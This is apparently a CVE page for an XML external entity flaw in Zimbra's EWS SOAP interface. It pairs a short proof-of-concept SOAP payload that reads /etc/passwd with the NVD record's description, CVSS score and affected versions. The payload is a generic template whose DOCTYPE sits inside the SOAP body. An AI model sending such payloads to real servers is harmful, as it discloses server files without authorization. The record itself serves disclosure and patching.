CVE-2026-33371

<!-- XXE PoC for Zimbra EWS --> <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header/> <soapenv:Body> <SomeOperation> <!-- Malicious XML with XXE payload --> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <param>&xxe;</param> </SomeOperation> </soapenv:Body> </soapenv:Envelope>

{"cve": {"id": "CVE-2026-33371", "sourceIdentifier": "[email protected]", "published": "2026-03-20T14:16:16.240", "lastModified": "2026-04-01T15:35:47.497", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Zimbra Collaboration (ZCS) 10.0 and 10.1. An XML External Entity (XXE) vulnerability exists in the Zimbra Exchange Web Services (EWS) SOAP interface due to improper handling of XML input. An authenticated attacker can submit crafted XML data that is processed by an XML parser with external entity resolution enabled. Successful exploitation may allow disclosure of sensitive local files from the server."}, {"lang": "es", "value": "Se descubrió un problema en Zimbra Collaboration (ZCS) 10.0 y 10.1. Existe una vulnerabilidad de entidad externa XML (XXE) en la interfaz SOAP de Zimbra Exchange Web Services (EWS) debido a un manejo inadecuado de la entrada XML. Un atacante autenticado puede enviar datos XML manipulados que son procesados por un analizador XML con la resolución de entidades externas habilitada. La explotación exitosa puede permitir la divulgación de archivos locales sensibles del servidor."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-611"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.0.0", "versionEndExcluding": "10.1.16", "matchCriteriaId": "E8DBE536-EAB0-48FF-A195-C0DB0A7FBCA0"}]}]}], "references": [{"url": "https://wiki.zimbra.com/wiki/Security_Center", "source": "[email protected]", "tags": ["Vendor Advisory", "Release Notes"]}, {"url": "https://wiki.zimbra.com/wiki/Zimbra_Releases/10.1.16#Security_Fixes", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}